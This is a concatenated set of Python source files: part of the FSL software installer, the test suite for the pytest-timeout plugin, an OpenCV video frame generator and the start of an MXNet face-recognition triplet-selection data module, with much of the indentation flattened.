if not requested_v:
version = Version(latest_release(url)['version'])
else:
try:
version = Version(requested_v)
except NotAFslVersion:
raise InstallError(
"%s doesn't look like a version" % requested_v)
if version > this_version:
# Update Available
if version.major > this_version.major:
# We don't support patching between major
# versions so download a fresh copy
return (UPGRADE, version)
else:
return (UPDATE, version)
else:
return (CURRENT, None)
class MakeApplicationLinksError(Exception):
def __init__(self, *args):
super(MakeApplicationLinksError, self).__init__(*args)
try:
self.app_messages = args[0]
except IndexError:
self.app_messages = []
def make_applications_links(fsldir, apps):
'''Create symlinks in /Applications'''
MsgUser.message("Creating Application links...")
results = {}
for app in apps:
app_location = os.path.join('/Applications', os.path.basename(app))
app_target = os.path.join(fsldir, app)
create_link = True
MsgUser.debug("Looking for existing link %s" % (app_location))
if os.path.lexists(app_location):
MsgUser.debug(
"Is a link: %s; realpath: %s" % (
os.path.islink(app_location),
os.path.realpath(app_location)))
if os.path.islink(app_location):
MsgUser.debug("A link already exists.")
if os.path.realpath(app_location) != app_target:
MsgUser.debug(
"Deleting old (incorrect) link %s" % (app_location))
try:
run_cmd_dropstdout("rm " + app_location, as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to remove broken"
" link to %s (%s)." % (app_target, str(e)))
results[app] = 'Unable to remove broken link to %s' % (
app_target)
create_link = False
else:
MsgUser.debug("Link is correct, skipping.")
create_link = False
else:
MsgUser.debug(
"%s doesn't look like a symlink, "
"so let's not delete it." % (app_location))
results[app] = (
"%s is not a link so hasn't been updated to point at the "
"new FSL install.") % (app_location)
create_link = False
if create_link:
MsgUser.debug('Create a link for %s' % (app))
if os.path.exists(app_target):
try:
run_cmd_dropstdout(
"ln -s %s %s" % (app_target, app_location),
as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to create link to %s (%s)." % (
app_target, str(e)))
results[app] = (
'Unable to create link to %s.') % (app_target)
else:
                MsgUser.debug(
                    'Unable to find application'
                    ' %s to link to.' % (app_target))
if results:
raise MakeApplicationLinksError(results)
class CheckX11Warning(Exception):
pass
def check_X11(x11):
'''Function to find X11 install on Mac OS X and confirm it is compatible.
Advise user to download Xquartz if necessary'''
MsgUser.message(
"Checking for X11 windowing system (required for FSL GUIs).")
xbin = ''
for x in x11['apps']:
if os.path.exists(os.path.join(x11['location'], x)):
xbin = x
if xbin != '':
# Find out what version is installed
x_v_cmd = [
'/usr/bin/mdls', '-name',
'kMDItemVersion', os.path.join(x11['location'], xbin)]
try:
cmd = Popen(x_v_cmd, stdout=PIPE, stderr=STDOUT)
(vstring, _) = cmd.communicate()
except Exception, e:
raise CheckX11Warning(
"Unable to check X11 version (%s)" % (str(e)))
if cmd.returncode:
MsgUser.debug("Error finding the version of X11 (%s)" % (vstring))
# App found, but can't tell version, warn the user
raise CheckX11Warning(
"X11 (required for FSL GUIs) is installed but I"
" can't tell what the version is.")
else:
# Returns:
# kMDItemVersion = "2.3.6"\n
(_, _, version) = vstring.strip().split()
if version.startswith('"'):
version = version[1:-1]
if version in x11['bad_versions']:
raise CheckX11Warning(
"X11 (required for FSL GUIs) is a version that"
" is known to cause problems. We suggest you"
" upgrade to the latest XQuartz release from "
"%s" % (x11['download_url']))
else:
MsgUser.debug(
"X11 found and is not a bad version"
" (%s: %s)." % (xbin, version))
else:
# No X11 found, warn the user
raise CheckX11Warning(
"The FSL GUIs require the X11 window system which I can't"
" find in the usual places. You can download a copy from %s"
" - you will need to install this before the GUIs will"
" function" % (x11['download_url']))
def do_install(options, settings):
MsgUser.message(
shell_colours.bold + settings.title + shell_colours.default)
if options.test_installer:
settings.main_mirror = options.test_installer
this_computer = Host
if not this_computer.supported:
MsgUser.debug("Unsupported host %s %s %s" % (
this_computer.o_s,
this_computer.arch,
this_computer.os_type))
raise InstallError(
"Unsupported host - you could try building from source")
if this_computer.o_s == "linux":
system_environment = True
with_matlab = False
application_links = False
x11 = False
elif this_computer.o_s == "darwin":
system_environment = False
with_matlab = True
application_links = True
x11 = True
else:
MsgUser.debug("Unrecognised OS %s" % (this_computer.o_s))
raise InstallError("Unrecognised OS")
my_uid = os.getuid()
def configure_environment(fsldir, env_all=False, skip=False, matlab=False):
if skip:
return
if env_all:
if system_environment:
# Setup the system-wise environment
try:
setup_system_environment(fsldir)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(
"Failed to configure system-wide profiles "
"with FSL settings: %s" % (str(e)))
except SetupEnvironmentSkip, e:
MsgUser.skipped(
"Some shells already configured: %s" % (str(e)))
else:
MsgUser.debug("System-wide profiles setup.")
MsgUser.ok("System-wide FSL configuration complete.")
else:
MsgUser.skipped(
"System-wide profiles not supported on this OS")
elif my_uid != 0:
# Setup the environment for the current user
try:
setup_environment(fsldir, with_matlab=matlab)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(str(e))
else:
MsgUser.ok(
"User profile updated with FSL settings, you will need "
"to log out and back in to use the FSL tools.")
if my_uid != 0:
if options.quiet:
settings.inst_qus.defaults = True
print '''
We may need administrator rights, but you have specified fully automated
mode - you may still be asked for an admin password if required.'''
print '''
To install in fully automated mode, either ensure this is running as the root
user (use sudo) or that you can write to the folder you wish to install
FSL in.'''
elif (not options.download and
not options.list_versions and
not options.list_builds and
not options.get_source and
not options.get_feeds):
MsgUser.warning(
            '''Some operations of the installer require administrative rights,
for example installing into the default folder of /usr/local.
If your account is an 'Administrator' (you have 'sudo' rights)
then you will be prompted for your administrator password
when necessary.''')
if not options.d_dir and options.quiet:
raise InstallError(
"Quiet mode requires you to specify the install location"
" (e.g. /usr/local)")
if not options.quiet and not (options.list_versions or options.list_builds):
MsgUser.message(
"When asked a question, the default answer is given in square "
"brackets.\nHit the Enter key to accept this default answer.")
if options.env_only and my_uid != 0:
configure_environment(
get_fsldir(specified_dir=options.d_dir),
options.env_all)
return
if options.archive:
if not options.skipchecksum:
if not options.checksum:
raise InstallError(
"No checksum provided and checking not disabled")
else:
checksummer = globals()[options.checksum_type + 'File']
if options.checksum != checksummer(options.archive):
raise InstallError("FSL archive doesn't match checksum")
else:
MsgUser.ok("FSL Package looks good")
arc_version = archive_version(options.archive)
MsgUser.message(
"Installing FSL software version %s..." % (arc_version))
fsldir = install_archive(
archive=options.archive, fsldir=options.d_dir)
try:
post_install(fsldir=fsldir, settings=settings, quiet=options.quiet)
except PostInstallError, e:
raise InstallError(str(e))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
return
# All the following options require the Internet...
try:
settings.mirror = fastest_mirror(
settings.mirrors, settings.mirrors_file)
except SiteNotResponding, e:
# We can't find the FSL site - possibly the internet is down
raise InstallError(e)
try:
self_update(settings.mirror)
except SelfUpdateError, e:
MsgUser.debug("Self update error: %s" % (str(e)))
MsgUser.warning("Error checking for updates to installer - continuing")
if options.list_versions:
# Download a list of available downloads from the webserver
list_releases(settings.mirror)
return
if options.list_builds:
# List all available builds
list_builds(settings.mirror)
return
if options.download:
MsgUser.debug("Attempting to download latest release")
try:
download_release(request_version=options.requestversion,
skip_verify=options.skipchecksum)
except DownloadFileError, e:
raise("Unable to download release %s" % (str(e)))
return
if options.update:
fsldir = get_fsldir()
status, new_v = check_for_updates(settings.mirror, fsldir=fsldir)
if status == UPDATE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('update'):
return
elif status == UPGRADE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('upgrade'):
return
else:
MsgUser.ok("FSL is up-to-date.")
return
if options.get_source:
MsgUser.debug("Attempting to download source")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
source_code=True)
except DownloadFileError, e:
raise("Unable to download source code %s" % (str(e)))
return
if options.get_feeds:
MsgUser.debug("Attempting to download FEEDS")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
feeds=True)
except DownloadFileError, e:
raise("Unable to download FEEDS %s" % (str(e)))
return
try:
(version, details) = get_web_version_and_details(
request_version=options.requestversion
)
if 'redirect' in details:
MsgUser.message("Please download FSL using the instructions here:")
MsgUser.message("%s" % (details['redirect']))
return
fsldir = get_fsldir(specified_dir=options.d_dir, install=True)
reinstall = True
if os.path.exists(fsldir):
inst_version = get_installed_version(fsldir)
if inst_version == version:
reinstall = Settings.inst_qus.ask_question('version_match')
if reinstall:
(fname, version, details) = download_release(
to_temp=True,
request_version=options.requestversion,
skip_verify=options.skipchecksum)
if not details['supported']:
MsgUser.debug(
"This OS is not officially supported -"
" you may experience issues"
)
MsgUser.debug(
"Installing %s from %s (details: %s)" % (
fname, version, details))
MsgUser.message(
"Installing FSL software version %s..." % (version))
install_archive(
archive=fname, fsldir=fsldir)
try:
safe_delete(fname)
except SafeDeleteError, e:
MsgUser.debug(
"Unable to delete downloaded package %s ; %s" % (
fname, str(e)))
if details['notes']:
MsgUser.message(details['notes'])
try:
post_install(
fsldir=fsldir, settings=settings,
quiet=options.quiet, x11=x11,
app_links=application_links)
except PostInstallError, e:
raise InstallError(str(e))
except DownloadError, e:
MsgUser.debug("Unable to download FSL %s" % (str(e)))
raise InstallError("Unable to download FSL")
except InstallArchiveError, e:
MsgUser.debug("Unable to unpack FSL ; %s" % (str(e)))
raise InstallError("Unable to unpack FSL - %s" % (str(e)))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
if details['notes']:
MsgUser.message(details['notes'])
def parse_options(args):
usage = "usage: %prog [options]"
ver = "%%prog %s" % (version)
parser = OptionParser(usage=usage, version=ver)
parser.add_option("-d", "--dest", dest="d_dir",
help="Install into folder given by DESTDIR - "
"e.g. /usr/local/fsl",
metavar="DESTDIR", action="store",
type="string")
parser.add_option("-e", dest="env_only",
help="Only setup/update your environment",
action="store_true")
parser.add_option("-E", dest="env_all",
help="Setup/update the environment for ALL users",
action="store_true")
parser.add_option("-v", help="Print version number and exit",
action="version")
parser.add_option("-c", "--checkupdate", dest='update',
help="Check for FSL updates -"
" needs an internet connection",
action="store_true")
parser.add_option("-o", "--downloadonly", dest="download",
help=SUPPRESS_HELP,
action="store_true")
advanced_group = OptionGroup(
parser, "Advanced Install Options",
"These are advanced install options")
advanced_group.add_option(
"-l", "--listversions", dest="list_versions",
help="List available versions of FSL",
action="store_true")
advanced_group.add_option(
"-b", "--listbuilds", dest="list_builds",
help="List available FSL builds",
action="store_true")
advanced_group.add_option(
"-B", "--fslbuild", dest="requestbuild",
help="Download the specific FSLBUILD of FSL",
metavar="FSLBUILD", action="store",
type="string")
advanced_group.add_option(
"-V", "--fslversion", dest="requestversion",
help="Download the specific version FSLVERSION of FSL",
metavar="FSLVERSION", action="store",
type="string")
advanced_group.add_option(
"-s", "--source", dest="get_source",
help="Download source code for FSL",
action="store_true")
advanced_group.add_option(
"-F", "--feeds", dest="get_feeds",
help="Download FEEDS",
action="store_true")
advanced_group.add_option(
"-q", "--quiet", dest='quiet',
help="Silence all messages - useful if scripting install",
action="store_true")
advanced_group.add_option(
"-p", dest="skip_env",
help="Don't setup the environment",
action="store_true")
parser.add_option_group(advanced_group)
debug_group = OptionGroup(
parser, "Debugging Options",
"These are for use if you have a problem running this installer.")
debug_group.add_option(
"-f", "--file", dest="archive",
help="Install a pre-downloaded copy of the FSL archive",
metavar="ARCHIVEFILE", action="store",
type="string")
debug_group.add_option(
"-C", "--checksum", dest="checksum",
help="Supply the expected checksum for the pre-downloaded FSL archive",
metavar="CHECKSUM", action="store",
type="string")
debug_group.add_option(
"-T", "--checksum-type", dest="checksum_type",
default="sha256",
help="Specify the type of checksum",
action="store",
type="string")
debug_group.add_option(
"-M", "--nochecksum", dest="skipchecksum",
help="Don't check the pre-downloaded FSL archive",
action="store_true")
debug_group.add_option(
"-D", dest="verbose",
help="Switch on debug messages",
action="store_true")
debug_group.add_option(
"-G", dest="test_installer",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-w", dest="test_csv",
help=SUPPRESS_HELP,
action="store_true"
)
parser.add_option_group(debug_group)
return parser.parse_args(args)
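# Illustrative command lines accepted by the options defined above (the script
# name is an assumption; the flags themselves come from parse_options):
#   python fslinstaller.py                     # interactive install to the default location
#   python fslinstaller.py -d /usr/local/fsl   # install into a specific folder
#   python fslinstaller.py -c                  # only check whether an update is available
#   python fslinstaller.py -l                  # list the available FSL versions
#   python fslinstaller.py -q -d /opt/fsl      # quiet install, useful when scripting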
def override_host(requestbuild):
'''Overrides attributes of the Host class in the event that the user
has requested a specific FSL build.
'''
if requestbuild == 'centos7_64':
Host.o_s = 'linux'
Host.arch = 'x86_64'
Host.vendor = 'centos'
Host.version = Version('7.8.2003')
Host.glibc = '2.2.5'
Host.supported = True
Host.bits = '64'
elif requestbuild == 'centos6_64':
Host.o_s = 'linux'
Host.arch = 'x86_64'
Host.vendor = 'centos'
Host.version = Version('6.10')
Host.glibc = '2.2.5'
Host.supported = True
Host.bits = '64'
elif requestbuild == 'macOS_64':
Host.o_s = 'darwin'
Host.arch = 'x86_64'
Host.vendor = 'apple'
Host.version = Version('19.6.0')
Host.glibc = ''
Host.supported = True
Host.bits = '64'
# Download x86 version if running on Apple
# M1, as it runs just fine under emulation
elif (requestbuild is None and
Host.o_s == 'darwin' and
Host.arch == 'arm64'):
Host.arch = 'x86_64'
if __name__ == '__main__':
(options, args) = parse_options(sys.argv[1:])
if options.verbose:
MsgUser.debugOn()
print options
if options.quiet:
MsgUser.quietOn()
if options.test_csv:
HAS_JSON = False
override_host(options.requestbuild)
installer_settings = Settings()
try:
do_install(options, installer_settings)
except BadVersion, e:
MsgUser.debug(str(e))
MsgUser.failed("Unable to find requested version!")
sys.exit(1)
except (InstallError, GetFslDirError, GetInstalledVersionError), e:
MsgUser.failed(str(e))
sys.exit(1)
except UnsupportedOs, e:
MsgUser.failed(str(e))
sys.exit(1)
except KeyboardInterrupt, e:
MsgUser.message('')
MsgUser.failed("Install aborted.")
sys.exit(1)
|
test_pytest_timeout.py
|
import os.path
import signal
import sys
import time
import pexpect
import pytest
pytest_plugins = "pytester"
have_sigalrm = pytest.mark.skipif(
not hasattr(signal, "SIGALRM"), reason="OS does not have SIGALRM"
)
have_spawn = pytest.mark.skipif(
not hasattr(pexpect, "spawn"), reason="pexpect does not have spawn"
)
@pytest.fixture
def testdir(testdir):
if hasattr(testdir, "runpytest_subprocess"):
# on pytest-2.8 runpytest runs inline by default
# patch the testdir instance to use the subprocess method
testdir.runpytest = testdir.runpytest_subprocess
return testdir
def test_header(testdir):
testdir.makepyfile(
"""
def test_x(): pass
"""
)
result = testdir.runpytest("--timeout=1")
result.stdout.fnmatch_lines(
["timeout: 1.0s", "timeout method:*", "timeout func_only:*"]
)
@have_sigalrm
def test_sigalrm(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest("--timeout=1")
result.stdout.fnmatch_lines(["*Failed: Timeout >1.0s*"])
def test_thread(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest("--timeout=1", "--timeout-method=thread")
result.stderr.fnmatch_lines(
[
"*++ Timeout ++*",
"*~~ Stack of MainThread* ~~*",
"*File *, line *, in *",
"*++ Timeout ++*",
]
)
assert "++ Timeout ++" in result.stderr.lines[-1]
@pytest.mark.skipif(
hasattr(sys, "pypy_version_info"), reason="pypy coverage seems broken currently"
)
def test_cov(testdir):
# This test requires pytest-cov
pytest.importorskip("pytest_cov")
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest(
"--timeout=1", "--cov=test_cov", "--timeout-method=thread"
)
result.stderr.fnmatch_lines(
[
"*++ Timeout ++*",
"*~~ Stack of MainThread* ~~*",
"*File *, line *, in *",
"*++ Timeout ++*",
]
)
assert "++ Timeout ++" in result.stderr.lines[-1]
def test_timeout_env(testdir, monkeypatch):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
monkeypatch.setitem(os.environ, "PYTEST_TIMEOUT", "1")
result = testdir.runpytest()
assert result.ret > 0
# @pytest.mark.parametrize('meth', [have_sigalrm('signal'), 'thread'])
# def test_func_fix(meth, testdir):
# testdir.makepyfile("""
# import time, pytest
# @pytest.fixture(scope='function')
# def fix():
# time.sleep(2)
# def test_foo(fix):
# pass
# """)
# result = testdir.runpytest('--timeout=1',
# '--timeout-method={0}'.format(meth))
# assert result.ret > 0
# assert 'Timeout' in result.stdout.str() + result.stderr.str()
@pytest.mark.parametrize("meth", [pytest.param("signal", marks=have_sigalrm), "thread"])
@pytest.mark.parametrize("scope", ["function", "class", "module", "session"])
def test_fix_setup(meth, scope, testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture(scope='{scope}')
def fix(self):
time.sleep(2)
def test_foo(self, fix):
pass
""".format(
scope=scope
)
)
result = testdir.runpytest("--timeout=1", f"--timeout-method={meth}")
assert result.ret > 0
assert "Timeout" in result.stdout.str() + result.stderr.str()
def test_fix_setup_func_only(testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture
def fix(self):
time.sleep(0.1)
@pytest.mark.timeout(func_only=True)
def test_foo(self, fix):
pass
"""
)
result = testdir.runpytest("--timeout=1")
assert result.ret == 0
assert "Timeout" not in result.stdout.str() + result.stderr.str()
@pytest.mark.parametrize("meth", [pytest.param("signal", marks=have_sigalrm), "thread"])
@pytest.mark.parametrize("scope", ["function", "class", "module", "session"])
def test_fix_finalizer(meth, scope, testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture
def fix(self, request):
print('fix setup')
def fin():
print('fix finaliser')
time.sleep(2)
request.addfinalizer(fin)
def test_foo(self, fix):
pass
"""
)
result = testdir.runpytest("--timeout=1", "-s", f"--timeout-method={meth}")
assert result.ret > 0
assert "Timeout" in result.stdout.str() + result.stderr.str()
def test_fix_finalizer_func_only(testdir):
testdir.makepyfile(
"""
import time, pytest
class TestFoo:
@pytest.fixture
def fix(self, request):
print('fix setup')
def fin():
print('fix finaliser')
time.sleep(0.1)
request.addfinalizer(fin)
@pytest.mark.timeout(func_only=True)
def test_foo(self, fix):
pass
"""
)
result = testdir.runpytest("--timeout=1", "-s")
assert result.ret == 0
assert "Timeout" not in result.stdout.str() + result.stderr.str()
@have_sigalrm
def test_timeout_mark_sigalrm(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(1)
def test_foo():
time.sleep(2)
assert False
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*Failed: Timeout >1.0s*"])
def test_timeout_mark_timer(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(1)
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest("--timeout-method=thread")
result.stderr.fnmatch_lines(["*++ Timeout ++*"])
def test_timeout_mark_non_int(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(0.01)
def test_foo():
time.sleep(1)
"""
)
result = testdir.runpytest("--timeout-method=thread")
result.stderr.fnmatch_lines(["*++ Timeout ++*"])
def test_timeout_mark_non_number(testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.timeout('foo')
def test_foo():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*ValueError*"])
def test_timeout_mark_args(testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.timeout(1, 2)
def test_foo():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*ValueError*"])
def test_timeout_mark_method_nokw(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(1, 'thread')
def test_foo():
time.sleep(2)
"""
)
result = testdir.runpytest()
result.stderr.fnmatch_lines(["*+ Timeout +*"])
def test_timeout_mark_noargs(testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.timeout
def test_foo():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*TypeError*"])
def test_ini_timeout(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
testdir.makeini(
"""
[pytest]
timeout = 1
"""
)
result = testdir.runpytest()
assert result.ret
def test_ini_timeout_func_only(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.fixture
def slow():
time.sleep(2)
def test_foo(slow):
pass
"""
)
testdir.makeini(
"""
[pytest]
timeout = 1
timeout_func_only = true
"""
)
result = testdir.runpytest()
assert result.ret == 0
def test_ini_method(testdir):
testdir.makepyfile(
"""
import time
def test_foo():
time.sleep(2)
"""
)
testdir.makeini(
"""
[pytest]
timeout = 1
timeout_method = thread
"""
)
result = testdir.runpytest()
assert "=== 1 failed in " not in result.outlines[-1]
def test_timeout_marker_inheritance(testdir):
testdir.makepyfile(
"""
import time, pytest
@pytest.mark.timeout(timeout=2)
class TestFoo:
@pytest.mark.timeout(timeout=3)
def test_foo_2(self):
time.sleep(2)
def test_foo_1(self):
time.sleep(1)
"""
)
result = testdir.runpytest("--timeout=1", "-s")
assert result.ret == 0
assert "Timeout" not in result.stdout.str() + result.stderr.str()
def test_marker_help(testdir):
result = testdir.runpytest("--markers")
result.stdout.fnmatch_lines(["@pytest.mark.timeout(*"])
@pytest.mark.parametrize(
["debugging_module", "debugging_set_trace"],
[
("pdb", "set_trace()"),
pytest.param(
"ipdb",
"set_trace()",
marks=pytest.mark.xfail(
reason="waiting on https://github.com/pytest-dev/pytest/pull/7207"
" to allow proper testing"
),
),
pytest.param(
"pydevd",
"settrace(port=4678)",
marks=pytest.mark.xfail(reason="in need of way to setup pydevd server"),
),
],
)
@have_spawn
def test_suppresses_timeout_when_debugger_is_entered(
testdir, debugging_module, debugging_set_trace
):
p1 = testdir.makepyfile(
"""
import pytest, {debugging_module}
@pytest.mark.timeout(1)
def test_foo():
{debugging_module}.{debugging_set_trace}
""".format(
debugging_module=debugging_module, debugging_set_trace=debugging_set_trace
)
)
child = testdir.spawn_pytest(str(p1))
child.expect("test_foo")
time.sleep(0.2)
child.send("c\n")
child.sendeof()
result = child.read().decode().lower()
if child.isalive():
child.terminate(force=True)
assert "timeout >1.0s" not in result
assert "fail" not in result
def test_is_debugging(monkeypatch):
import pytest_timeout
assert not pytest_timeout.is_debugging()
# create a fake module named "custom.pydevd" with a trace function on it
from types import ModuleType
module_name = "custom.pydevd"
module = ModuleType(module_name)
monkeypatch.setitem(sys.modules, module_name, module)
def custom_trace(*args):
pass
custom_trace.__module__ = module_name
module.custom_trace = custom_trace
assert pytest_timeout.is_debugging(custom_trace)
def test_not_main_thread(testdir):
testdir.makepyfile(
"""
import threading
import pytest_timeout
current_timeout_setup = pytest_timeout.timeout_setup
def new_timeout_setup(item):
threading.Thread(
                target=current_timeout_setup, args=(item,),
).join()
pytest_timeout.timeout_setup = new_timeout_setup
def test_x(): pass
"""
)
result = testdir.runpytest("--timeout=1")
result.stdout.fnmatch_lines(
["timeout: 1.0s", "timeout method:*", "timeout func_only:*"]
)
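# Illustrative ways of enabling the timeout behaviour exercised by the tests above
# (flag, ini and environment-variable spellings are taken from those tests):
#   pytest --timeout=300
#   pytest --timeout=60 --timeout-method=thread
#   PYTEST_TIMEOUT=10 pytest
# or via the ini file:
#   [pytest]
#   timeout = 120
#   timeout_func_only = true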
|
video.py
|
import abc
import asyncio
import dataclasses
import multiprocessing
import os
import queue
import time
import typing
import cv2 # type: ignore
import dataclasses_json
from ffpyplayer.player import MediaPlayer # type: ignore
@dataclasses_json.dataclass_json(undefined='raise')
@dataclasses.dataclass(frozen=True)
class VideoInputConfig:
target_fps: float
@dataclasses_json.dataclass_json(undefined='raise')
@dataclasses.dataclass(frozen=True)
class FileInputConfig:
path: str
play_audio: bool
@dataclasses_json.dataclass_json(undefined='raise')
@dataclasses.dataclass(frozen=True)
class WebcamInputConfig:
device_id: int
@dataclasses.dataclass
class VideoFrame:
timestamp_s: float
video_data: typing.Any # TODO(TK): replace with np.typing.ArrayLike when numpy upgrades to 1.20+ (conditional on TensorFlow support)
class VideoFrameGenerator(abc.ABC):
def __init__(self, target_fps: float) -> None:
self._target_fps = target_fps
self._queue_live: queue.Queue[VideoFrame] = multiprocessing.Queue()
self._semaphore_live = multiprocessing.Semaphore(value=0)
self._queue_downsampled: queue.Queue[VideoFrame] = multiprocessing.Queue()
self._semaphore_downsampled = multiprocessing.Semaphore(value=0)
self._proc = multiprocessing.Process(target=self._gen)
def __enter__(self) -> 'VideoFrameGenerator':
return self
def __exit__(self, exc_type: typing.Any, exc_val: typing.Any, exc_tb: typing.Any) -> None:
return
def _gen(self) -> None:
raise NotImplementedError()
async def gen_async_live(self) -> typing.AsyncGenerator[VideoFrame, None]:
try:
if not self._proc.is_alive():
self._proc.start()
while self._proc.is_alive() or not self._queue_live.empty():
if not self._semaphore_live.acquire(block=False):
await asyncio.sleep(0)
continue
elem = self._queue_live.get()
yield elem
return
except asyncio.CancelledError:
pass
async def gen_async_downsampled(self) -> typing.AsyncGenerator[VideoFrame, None]:
try:
if not self._proc.is_alive():
self._proc.start()
            while self._proc.is_alive() or not self._queue_downsampled.empty():
if not self._semaphore_downsampled.acquire(block=False):
await asyncio.sleep(0)
continue
elem = self._queue_downsampled.get()
yield elem
return
except asyncio.CancelledError:
pass
class WebcamFrameGenerator(VideoFrameGenerator):
def __init__(self, target_fps: float, config: WebcamInputConfig) -> None:
super().__init__(target_fps=target_fps)
self._config = config
def _gen(self) -> None:
cap = cv2.VideoCapture(self._config.device_id) # noqa
if not cap.isOpened():
raise RuntimeError("Failed to open camera")
timestamp_initial: typing.Optional[float] = None
timestamp_target: typing.Optional[float] = None
while True:
ret, frame = cap.read()
timestamp = cap.get(cv2.CAP_PROP_POS_MSEC) / 1000.0
if timestamp_initial is None:
timestamp_initial = timestamp
if timestamp_target is None:
timestamp_target = timestamp
if ret:
video_frame = VideoFrame(timestamp_s=timestamp - timestamp_initial, video_data=frame)
self._queue_live.put(video_frame)
self._semaphore_live.release()
if timestamp >= timestamp_target:
timestamp_target += 1.0 / self._target_fps
self._queue_downsampled.put(video_frame)
self._semaphore_downsampled.release()
else:
cap.release()
return
class VideoFileFrameGenerator(VideoFrameGenerator):
def __init__(self, target_fps: float, config: FileInputConfig) -> None:
super().__init__(target_fps=target_fps)
self._config = config
if not os.path.exists(self._config.path):
raise FileNotFoundError(self._config.path)
def _gen(self) -> None:
if self._config.play_audio:
# we need to assign to a variable, even if unused, to prevent MediaPlayer from being GC'd
# TODO(TK): consider moving this to the audio file sensor
audio_player = MediaPlayer(self._config.path)
print("MediaPlayer (audio) loaded", flush=True)
else:
audio_player = None
cap = cv2.VideoCapture(self._config.path)
if not cap.isOpened():
raise RuntimeError("Failed to open video file!")
print("VideoCapture file loaded", flush=True)
timestamp_target: typing.Optional[float] = None
wallclock_begin = time.time()
timestamp_begin: typing.Optional[float] = None
while True:
            # Retrieve a frame to prevent garbage collection:
if audio_player is not None:
audio_player.get_frame(force_refresh=False, show=False)
ret, frame = cap.read()
timestamp_s = cap.get(cv2.CAP_PROP_POS_MSEC) / 1000.0 # noqa
if timestamp_begin is None:
timestamp_begin = timestamp_s
assert timestamp_begin == 0.0 # we can handle the case it isn't, but do expect it to be
if ret:
video_frame = VideoFrame(timestamp_s=timestamp_s - timestamp_begin, video_data=frame)
self._queue_live.put(video_frame)
self._semaphore_live.release()
# TODO(TK): Why do we get some timestamp_s=0 frames at the end?
if timestamp_target is None or timestamp_s >= timestamp_target:
timestamp_target = timestamp_target + 1.0 / self._target_fps if timestamp_target is not None else timestamp_s
self._queue_downsampled.put(video_frame)
self._semaphore_downsampled.release()
if timestamp_target is not None:
wallclock_elapsed = time.time() - wallclock_begin
video_elapsed = timestamp_s - timestamp_begin
wait_time = video_elapsed - wallclock_elapsed
if wait_time > 0:
time.sleep(wait_time)
else:
cap.release()
return
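# Minimal consumption sketch (illustrative only; "example.mp4" is a placeholder path):
#
#   async def consume() -> None:
#       config = FileInputConfig(path="example.mp4", play_audio=False)
#       with VideoFileFrameGenerator(target_fps=5.0, config=config) as gen:
#           async for frame in gen.gen_async_downsampled():
#               print(frame.timestamp_s, frame.video_data.shape)
#
#   asyncio.run(consume())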
|
data.py
|
# THIS FILE IS FOR EXPERIMENTS, USE image_iter.py FOR NORMAL IMAGE LOADING.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import logging
import sys
import numbers
import math
import sklearn
import datetime
import numpy as np
import cv2
import mxnet as mx
from mxnet import ndarray as nd
#from . import _ndarray_internal as _internal
#from mxnet._ndarray_internal import _cvimresize as imresize
#from ._ndarray_internal import _cvcopyMakeBorder as copyMakeBorder
from mxnet import io
from mxnet import recordio
sys.path.append(os.path.join(os.path.dirname(__file__), 'common'))
import face_preprocess
import multiprocessing
logger = logging.getLogger()
def pick_triplets_impl(q_in, q_out):
more = True
while more:
deq = q_in.get()
if deq is None:
more = False
else:
embeddings, emb_start_idx, nrof_images, alpha = deq
print('running', emb_start_idx, nrof_images, os.getpid())
for j in xrange(1,nrof_images):
a_idx = emb_start_idx + j - 1
neg_dists_sqr = np.sum(np.square(embeddings[a_idx] - embeddings), 1)
for pair in xrange(j, nrof_images): # For every possible positive pair.
p_idx = emb_start_idx + pair
pos_dist_sqr = np.sum(np.square(embeddings[a_idx]-embeddings[p_idx]))
neg_dists_sqr[emb_start_idx:emb_start_idx+nrof_images] = np.NaN
all_neg = np.where(np.logical_and(neg_dists_sqr-pos_dist_sqr<alpha, pos_dist_sqr<neg_dists_sqr))[0] # FaceNet selection
                    #all_neg = np.where(neg_dists_sqr-pos_dist_sqr<alpha)[0] # VGG Face selection
nrof_random_negs = all_neg.shape[0]
if nrof_random_negs>0:
rnd_idx = np.random.randint(nrof_random_negs)
n_idx = all_neg[rnd_idx]
#triplets.append( (a_idx, p_idx, n_idx) )
